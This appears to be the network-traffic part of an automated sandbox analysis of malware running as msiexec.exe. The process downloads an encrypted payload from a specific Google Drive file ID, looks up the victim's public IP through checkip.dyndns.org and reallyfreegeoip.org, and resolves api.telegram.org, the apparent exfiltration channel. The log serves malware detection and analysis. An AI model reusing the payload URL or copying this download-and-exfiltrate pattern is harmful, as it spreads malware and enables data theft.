Feb 20, 2025 20:02:30.194999933 CET  53           55852      1.1.1.1      192.168.2.7
Feb 20, 2025 20:02:31.712615013 CET  50659        53         192.168.2.7  1.1.1.1
Feb 20, 2025 20:02:31.720721006 CET  53           50659      1.1.1.1      192.168.2.7
Feb 20, 2025 20:02:42.621654034 CET  53929        53         192.168.2.7  1.1.1.1
Feb 20, 2025 20:02:42.629725933 CET  53           53929      1.1.1.1      192.168.2.7
Timestamp                            Source IP    Dest IP  Trans ID  OP Code             Name                          Type            Class        DNS over HTTPS
Feb 20, 2025 20:02:25.172689915 CET  192.168.2.7  1.1.1.1  0xfea8    Standard query (0)  drive.google.com              A (IP address)  IN (0x0001)  false
Feb 20, 2025 20:02:26.321118116 CET  192.168.2.7  1.1.1.1  0xd91e    Standard query (0)  drive.usercontent.google.com  A (IP address)  IN (0x0001)  false
Feb 20, 2025 20:02:30.187308073 CET  192.168.2.7  1.1.1.1  0x583f    Standard query (0)  checkip.dyndns.org            A (IP address)  IN (0x0001)  false
Feb 20, 2025 20:02:31.712615013 CET  192.168.2.7  1.1.1.1  0xc74     Standard query (0)  reallyfreegeoip.org           A (IP address)  IN (0x0001)  false
Feb 20, 2025 20:02:42.621654034 CET  192.168.2.7  1.1.1.1  0x2a10    Standard query (0)  api.telegram.org              A (IP address)  IN (0x0001)  false
Timestamp                            Source IP  Dest IP      Trans ID  Reply Code    Name                          CName               Address          Type                    Class        DNS over HTTPS
Feb 20, 2025 20:02:25.180116892 CET  1.1.1.1    192.168.2.7  0xfea8    No error (0)  drive.google.com              -                   142.250.184.238  A (IP address)          IN (0x0001)  false
Feb 20, 2025 20:02:26.328789949 CET  1.1.1.1    192.168.2.7  0xd91e    No error (0)  drive.usercontent.google.com  -                   172.217.16.129   A (IP address)          IN (0x0001)  false
Feb 20, 2025 20:02:30.194999933 CET  1.1.1.1    192.168.2.7  0x583f    No error (0)  checkip.dyndns.org            checkip.dyndns.com  -                CNAME (Canonical name)  IN (0x0001)  false
Feb 20, 2025 20:02:30.194999933 CET  1.1.1.1    192.168.2.7  0x583f    No error (0)  checkip.dyndns.com            -                   132.226.247.73   A (IP address)          IN (0x0001)  false
Feb 20, 2025 20:02:30.194999933 CET  1.1.1.1    192.168.2.7  0x583f    No error (0)  checkip.dyndns.com            -                   132.226.8.169    A (IP address)          IN (0x0001)  false
Feb 20, 2025 20:02:30.194999933 CET  1.1.1.1    192.168.2.7  0x583f    No error (0)  checkip.dyndns.com            -                   158.101.44.242   A (IP address)          IN (0x0001)  false
Feb 20, 2025 20:02:30.194999933 CET  1.1.1.1    192.168.2.7  0x583f    No error (0)  checkip.dyndns.com            -                   193.122.6.168    A (IP address)          IN (0x0001)  false
Feb 20, 2025 20:02:30.194999933 CET  1.1.1.1    192.168.2.7  0x583f    No error (0)  checkip.dyndns.com            -                   193.122.130.0    A (IP address)          IN (0x0001)  false
Feb 20, 2025 20:02:31.720721006 CET  1.1.1.1    192.168.2.7  0xc74     No error (0)  reallyfreegeoip.org           -                   104.21.32.1      A (IP address)          IN (0x0001)  false
Feb 20, 2025 20:02:31.720721006 CET  1.1.1.1    192.168.2.7  0xc74     No error (0)  reallyfreegeoip.org           -                   104.21.112.1     A (IP address)          IN (0x0001)  false
Feb 20, 2025 20:02:31.720721006 CET  1.1.1.1    192.168.2.7  0xc74     No error (0)  reallyfreegeoip.org           -                   104.21.80.1      A (IP address)          IN (0x0001)  false
Feb 20, 2025 20:02:31.720721006 CET  1.1.1.1    192.168.2.7  0xc74     No error (0)  reallyfreegeoip.org           -                   104.21.48.1      A (IP address)          IN (0x0001)  false
Feb 20, 2025 20:02:31.720721006 CET  1.1.1.1    192.168.2.7  0xc74     No error (0)  reallyfreegeoip.org           -                   104.21.16.1      A (IP address)          IN (0x0001)  false
Feb 20, 2025 20:02:31.720721006 CET  1.1.1.1    192.168.2.7  0xc74     No error (0)  reallyfreegeoip.org           -                   104.21.64.1      A (IP address)          IN (0x0001)  false
Feb 20, 2025 20:02:31.720721006 CET  1.1.1.1    192.168.2.7  0xc74     No error (0)  reallyfreegeoip.org           -                   104.21.96.1      A (IP address)          IN (0x0001)  false
Feb 20, 2025 20:02:42.629725933 CET  1.1.1.1    192.168.2.7  0x2a10    No error (0)  api.telegram.org              -                   149.154.167.220  A (IP address)          IN (0x0001)  false
• drive.google.com
• drive.usercontent.google.com
• reallyfreegeoip.org
• api.telegram.org
• checkip.dyndns.org
Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
0           192.168.2.7  49977        132.226.247.73  80                8180  C:\Windows\SysWOW64\msiexec.exe

Timestamp                            Bytes transferred  Direction  Data
Feb 20, 2025 20:02:30.203558922 CET  151                OUT
    GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Feb 20, 2025 20:02:30.882239103 CET  273                IN
    HTTP/1.1 200 OK
    Date: Thu, 20 Feb 2025 19:02:30 GMT
    Content-Type: text/html
    Content-Length: 104
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Feb 20, 2025 20:02:30.888998032 CET  127                OUT
    GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
Feb 20, 2025 20:02:31.095360994 CET  273                IN
    HTTP/1.1 200 OK
    Date: Thu, 20 Feb 2025 19:02:30 GMT
    Content-Type: text/html
    Content-Length: 104
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Feb 20, 2025 20:02:32.350383997 CET  127                OUT
    GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
Feb 20, 2025 20:02:32.557322979 CET  273                IN
    HTTP/1.1 200 OK
    Date: Thu, 20 Feb 2025 19:02:32 GMT
    Content-Type: text/html
    Content-Length: 104
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
1           192.168.2.7  49980        132.226.247.73  80                8180  C:\Windows\SysWOW64\msiexec.exe

Timestamp                            Bytes transferred  Direction  Data
Feb 20, 2025 20:02:33.204751968 CET  127                OUT
    GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
Feb 20, 2025 20:02:33.884541988 CET  273                IN
    HTTP/1.1 200 OK
    Date: Thu, 20 Feb 2025 19:02:33 GMT
    Content-Type: text/html
    Content-Length: 104
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.7 | 49982 | 132.226.247.73 | 80 | 8180 | C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
Feb 20, 2025 20:02:34.546185017 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Feb 20, 2025 20:02:35.219361067 CET | 273 | IN | HTTP/1.1 200 OK
Date: Thu, 20 Feb 2025 19:02:35 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.7 | 49984 | 132.226.247.73 | 80 | 8180 | C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
Feb 20, 2025 20:02:35.848886013 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Feb 20, 2025 20:02:36.513233900 CET | 273 | IN | HTTP/1.1 200 OK
Date: Thu, 20 Feb 2025 19:02:36 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.7 | 49986 | 132.226.247.73 | 80 | 8180 | C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
Feb 20, 2025 20:02:37.141876936 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Feb 20, 2025 20:02:37.806725979 CET | 273 | IN | HTTP/1.1 200 OK
Date: Thu, 20 Feb 2025 19:02:37 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.7 | 49988 | 132.226.247.73 | 80 | 8180 | C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
Feb 20, 2025 20:02:38.446244955 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Feb 20, 2025 20:02:39.154953957 CET | 273 | IN | HTTP/1.1 200 OK
Date: Thu, 20 Feb 2025 19:02:39 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.7 | 49990 | 132.226.247.73 | 80 | 8180 | C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
Feb 20, 2025 20:02:39.824506998 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Feb 20, 2025 20:02:40.509510040 CET | 273 | IN | HTTP/1.1 200 OK
Date: Thu, 20 Feb 2025 19:02:40 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.7 | 49992 | 132.226.247.73 | 80 | 8180 | C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
Feb 20, 2025 20:02:41.165699959 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Feb 20, 2025 20:02:41.849900961 CET | 273 | IN | HTTP/1.1 200 OK
Date: Thu, 20 Feb 2025 19:02:41 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49975 | 142.250.184.238 | 443 | 8180 | C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
2025-02-20 19:02:25 UTC | 216 | OUT | GET /uc?export=download&id=1op1yD792kZI-PIBIgKY8tFU8QiYMScoB HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
Host: drive.google.com
Cache-Control: no-cache
2025-02-20 19:02:26 UTC | 1610 | IN | HTTP/1.1 303 See Other
Content-Type: application/binary
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Thu, 20 Feb 2025 19:02:26 GMT
Location: https://drive.usercontent.google.com/download?id=1op1yD792kZI-PIBIgKY8tFU8QiYMScoB&export=download
Strict-Transport-Security: max-age=31536000
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
Content-Security-Policy: script-src 'nonce-HBtn0gZUGP8FUKget6us-Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
Cross-Origin-Opener-Policy: same-origin
Server: ESF
Content-Length: 0
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.7 | 49976 | 172.217.16.129 | 443 | 8180 | C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
2025-02-20 19:02:26 UTC | 258 | OUT | GET /download?id=1op1yD792kZI-PIBIgKY8tFU8QiYMScoB&export=download HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
Cache-Control: no-cache
Host: drive.usercontent.google.com
Connection: Keep-Alive
2025-02-20 19:02:29 UTC | 5020 | IN | HTTP/1.1 200 OK
X-GUploader-UploadID: AHMx-iFLv0c4QTLbwyjg_oeTWVOEp4u498eVXP_QAig4HDh3y5zurQAxN7wEefoyGRGLboz0-A_doVU
Content-Type: application/octet-stream
Content-Security-Policy: sandbox
Content-Security-Policy: default-src 'none'
Content-Security-Policy: frame-ancestors 'none'
X-Content-Security-Policy: sandbox
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Resource-Policy: same-site
X-Content-Type-Options: nosniff
Content-Disposition: attachment; filename="knRcZfRKst249.bin"
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: false
Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
Access-Control-Allow-Methods: GET,HEAD,OPTIONS
Accept-Ranges: bytes
Content-Length: 278080
Last-Modified: Thu, 20 Feb 2025 13:18:44 GMT
Date: Thu, 20 Feb 2025 19:02:29 GMT
                                                                                                                                                    Expires: Thu, 20 Feb 2025 19:02:29 GMT
                                                                                                                                                    Cache-Control: private, max-age=0
                                                                                                                                                    X-Goog-Hash: crc32c=XnXuZg==
                                                                                                                                                    Server: UploadServer
                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                    Connection: close
2025-02-20 19:02:29 UTC | 5020 bytes | IN | Data Raw: b5 6c 71 7e c0 37 66 81 a2 14 f6 03 cb b5 4c 2a 4e d5 23 db 11 f7 b0 93 9b be 7c 45 ab 63 45 8e d1 e3 59 9c f4 ce 1b f3 ab 19 d9 88 72 b2 ed 06 1c 09 cd 57 75 c2 29 4f 3b 0d 56 b1 a3 ce e5 2f cf 19 dd 4b 18 4f f7 e5 e0 e4 4e aa 8b 34 88 d5 b1 ac 93 ba 97 63 d8 4f 0b 1f aa bc f1 a1 73 c2 e9 ec ec bc 72 84 f9 3a ba ad b7 eb 0a bd ac 4f 3c 1b c2 33 69 f2 a5 f9 a3 b8 ba 4a e6 ea 75 e1 02 3b fb f5 f7 d0 02 4d bb 93 a4 ff 38 8f a0 7b 58 f5 b0 1a 04 1a 3e ba 99 1a b6 58 4c 23 d6 0d 90 59 53 d3 a0 b3 c1 ff ef 7f 49 ce b9 9b 69 bb 6e 2a 83 01 f3 ac e9 ca 67 92 9a c6 21 64 47 46 5b e4 ea 8b 2c f5 03 2b c3 f8 8e 50 38 24 49 d3 ed fd 80 5c eb 17 6b 6f a3 e3 73 e9 ac ed a9 7e d5 6f aa 4c aa f9 28 6c c6 3d 4d 94 09 76 54 38 44 80 87 6d 95 15 2c 4d b6 6a 60 e7 df 5f 37
    Data Ascii: lq~7fL*N#|EcEYrWu)O;V/KON4cOsr:O<3iJu;M8{X>XL#YSIin*g!dGF[,+P8$I\kos~oL(l=MvT8Dm,Mj`_7
2025-02-20 19:02:29 UTC | 4654 bytes | IN | Data Raw: 5c 05 e8 55 a1 7c 9d 8e fe 2b 1d e6 31 ad 2c 27 78 1c 91 7f ce 61 75 fe 2b 9b 36 5f 2f 35 2c 6d 0f 10 3b 66 e5 3c 87 86 ba 94 3e 78 8c 1a e9 f6 dc 7f 7f 54 5c 37 a2 ec 84 e3 12 2b 73 27 b1 8e ec e9 eb 57 a7 9d 05 03 76 6f 0f f3 f7 02 ae 7a 6a ef c2 b6 e9 ce 65 91 33 bf 3e e8 08 f7 5a 2d 19 de 11 29 bb ae 6f db 5a 46 b8 70 84 70 8a 41 6a 9c 53 19 a8 43 95 5c 7c 14 f7 93 a3 1a b9 f7 e0 e2 2c 8d d1 f4 85 56 0d a3 9c e1 99 38 87 a5 6a c5 2e d4 12 ed 3b 34 af dd 62 78 bb 8e 62 7a 40 dc 30 74 e1 bc 2d 83 6c 32 3b d1 fa 87 a0 94 7c d8 09 46 35 e8 7a c3 6a 3d e7 0a 15 80 84 bd e8 de 1a 69 c4 fd f9 5e dd 52 03 02 35 c1 84 b1 bb e2 37 d4 07 26 f8 16 34 74 5a ac 7b 94 8a 61 e9 c4 ae 34 e5 0e 0d ee 32 e7 fd b4 b5 0d be 93 ff 5b a2 0f 1f 41 61 5e 12 c1 bd b0 d4 49 78
    Data Ascii: \U|+1,'xau+6_/5,m;f<>xT\7+s'Wvozje3>Z-)oZFppAjSC\|,V8j.;4bxbz@0t-l2;|F5zj=i^R57&4tZ{a42[Aa^Ix
2025-02-20 19:02:29 UTC | 1326 bytes | IN | Data Raw: b4 b4 33 a3 1e bc 5b fb 0e 31 33 13 6b 1d c1 cd 12 f3 5e 1f 57 48 56 6f 9f de b1 80 39 0e a9 42 59 24 71 77 26 69 e9 03 b2 38 bb 49 1a 1d 6f f6 ab 0c e6 60 9d 31 16 29 21 6b 31 cb da df 64 e4 f6 a9 a2 63 09 0e 44 86 80 3f 37 4f 63 72 bf fd 1c be e0 6a 73 2a 5d ec 12 0b e8 99 a8 6c 5c 8e 5b 5d c1 79 66 83 30 ad 02 ad c3 da 56 10 ca 36 68 62 7a 5a d0 d6 d4 47 b4 74 35 07 38 ed 4d 33 ea 64 2b 6c 08 ae c8 3a 3e 7d 03 7a d1 0c 33 60 18 16 5a 07 e4 97 8b 97 e8 1e 96 da 08 5d 38 81 d4 fc 00 22 a7 7e 77 85 2b 4e 0d 5a 79 5f 9c 44 d2 55 1b d7 9b f1 4b 55 79 29 ae 7e 71 82 16 ac 63 43 24 11 d8 95 09 12 10 ef b9 9f 89 aa 75 30 0f eb 51 f8 b3 71 14 3a 72 a1 4d d6 1f 4d 89 54 7c 27 63 35 2f 3e 81 79 fb 31 dc 0b 11 8b 78 00 05 7c e6 ac dc f5 67 09 61 a0 46 68 b9 03 48
    Data Ascii: 3[13k^WHVo9BY$qw&i8Io`1)!k1dcD?7Ocrjs*]l\[]yf0V6hbzZGt58M3d+l:>}z3`Z]8"~w+NZy_DUKUy)~qcC$u0Qq:rMMT|'c5/>y1x|gaFhH
2025-02-20 19:02:29 UTC | 1390 bytes | IN | Data Raw: 33 bf 74 99 7a 70 40 2d 6e 7b 5b 56 93 18 65 dc 3f 8d 9d 68 fc 06 f2 41 1a 34 7a 00 f3 9e 95 5c 7c a5 d6 89 c0 7f a3 e0 e3 2c 04 fa db e7 8a f4 34 d1 ef 8c 93 2b 93 c4 e1 c6 28 a6 03 9c 3b 34 a1 f5 f5 76 bb 95 16 e3 5a cd 46 33 a3 bc 2d 8f 7d f0 3b c1 bd ad a0 94 70 d5 0a 3f 34 f9 7f ca 4a 18 e2 65 1e 93 9b b7 c0 60 c4 67 ce 32 fd 72 d5 43 07 13 00 c1 84 bf c9 ab 3c fc 07 30 d0 9f 3e aa 5c ba 82 b9 9e 46 97 e5 97 fa ef 0e d1 c0 42 e7 fd be a9 b4 ff 93 fd 5a de 19 66 1e 6e 50 62 63 98 a7 fe ff 37 e1 42 f4 40 25 89 fc fd 6c 71 0b 17 e2 7f 50 09 1e 6d 4b 22 0a 6f d8 34 63 62 cd a3 12 57 d7 1e b7 35 b4 08 9f 3c aa b6 5d a0 c6 bc 23 81 d5 69 66 58 2b da 8a 2c 1c 59 e6 3a 31 94 77 f4 36 18 92 32 5d 9c b8 41 3e b1 1e 66 4f 80 e8 7c d0 1d 3a 02 59 b2 fe 88 da ae
    Data Ascii: 3tzp@-n{[Ve?hA4z\|,4+(;4vZF3-};p?4Je`g2rC<0>\FBZfnPbc7B@%lqPmK"o4cbW5<]#ifX+,Y:1w62]A>fO|:Y
2025-02-20 19:02:29 UTC | 1390 bytes | IN | Data Raw: e9 9f 8e 46 3c 35 65 3f ad 26 31 86 1d 82 7a df 64 4c b9 2b 9b 36 5f ec ca 2a 50 d7 11 3d 15 96 3c 87 8c d4 f0 3e 79 9d 2a 99 34 6d 7f 75 47 49 26 a4 83 be e3 3a 4a 00 e4 bb 85 e1 ae 75 57 a7 9d 06 7d 2c 00 ca f9 98 6e d0 47 60 ef c1 c6 3f 43 04 9b 33 af 57 fd 8f e7 50 5d 36 6f 7e 41 b1 dc f8 cc 35 5f 90 2b 8e 1f ea 2e ad 96 5f 13 db 39 93 47 fb 46 f3 93 b3 3b a7 92 5c 9d 2c fd 79 c2 97 7e aa a6 ef 86 3b 1d 95 c4 39 db 28 a6 df a6 22 4a 9d dd bc 72 19 ba 7e 24 a3 dd 36 6b 42 94 5a 89 6c e4 45 1d 95 e8 aa 94 08 fe d7 48 31 8a 92 ef 62 26 f1 62 05 86 eb 66 e8 02 ce 76 c3 83 2e 72 d5 49 07 13 08 c1 84 bf c8 f7 3e fc 7d 35 f0 62 0f aa 56 a8 0e 2d 8f 66 f6 d3 86 b7 ef 0e db fe e6 e6 ee bd a5 30 92 9f ec 53 ec 60 de 25 61 5a 12 c1 96 bb d6 58 3f f7 27 9c 65 3d
